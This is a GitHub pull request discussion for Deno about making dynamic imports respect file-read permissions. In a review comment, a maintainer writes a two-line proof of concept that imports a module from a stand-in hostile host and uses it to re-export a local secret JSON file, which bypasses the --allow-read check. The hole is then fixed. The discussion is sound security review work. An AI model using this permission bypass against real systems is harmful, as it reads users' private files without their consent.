Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Dynamic import should respect permissions #2764

Merged
merged 3 commits into from
Aug 13, 2019
Merged

Dynamic import should respect permissions #2764

merged 3 commits into from
Aug 13, 2019

Conversation

ry
Copy link
Member

@ry ry commented Aug 12, 2019
edited
Loading

Fixes #2761

cc @kevinkassimo

@ry ry requested a review from piscisaureus August 12, 2019 15:10
@piscisaureus
Copy link
Member

But what about indirect dynamic imports?

I think I can still bypass the --allow-read check:

await import('http://bert.is.evil/import_local.js');

And then I host import_local.js on bert.is.evil:

export * from 'file:///home/bert/juicy_secret.json';

That's because only the top-level dynamic import is checked for permissions, and its submodules don't go through the normal import machinery.

@ry
Copy link
Member Author

ry commented Aug 12, 2019

@piscisaureus I believe I've fixed that problem now. See tests/error_016_dynamic_import_permissions2

@kevinkassimo
Copy link
Contributor

kevinkassimo commented Aug 12, 2019
edited
Loading

LGTM for this PR, though I do start to think if the capability of importing JSON with static import is also problematic at times. It is totally possible for people to deduce file locations with common system hierarchy (e.g. under /etc).

I feel like maybe we should also add a --no-json-import flag, or somehow find a way to ban remote files from importing from local filesystem (which is very likely to be doing no good) (seems just banning file:// or absolute import would work Needs double check)

@ry
Copy link
Member Author

ry commented Aug 12, 2019
edited
Loading

maybe we should also add a --no-json-import flag

Eh - this seems too specific and I don't think it's necessary either.

somehow find a way to ban remote files from importing from local filesystem (which is very likely to be doing no good)

I agree. Certainly this isn't allowed in browsers? I've added an issue for this #2768

This was referenced Aug 12, 2019
Closed
Merged
@teleclimber
Copy link

I do start to think if the capability of importing JSON with static import is also problematic at times. It is totally possible for people to deduce file locations with common system hierarchy (e.g. under /etc).

Definitely. I seems to me it does not matter whether an import is static or dynamic. If you're reading it you need an allow-read permission. Period.

piscisaureus
piscisaureus reviewed Aug 13, 2019
View reviewed changes
cli/state.rs
self.check_read(&filename)?;
Ok(())
}
_ => Err(permission_denied()),
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

A "unsupported import url" or something error would be more appropriate here.

@ry ry merged commit 1f8b1a5 into denoland:master Aug 13, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@piscisaureus piscisaureus piscisaureus approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Dynamic import should respect permissions
4 participants
@ry @piscisaureus @kevinkassimo @teleclimber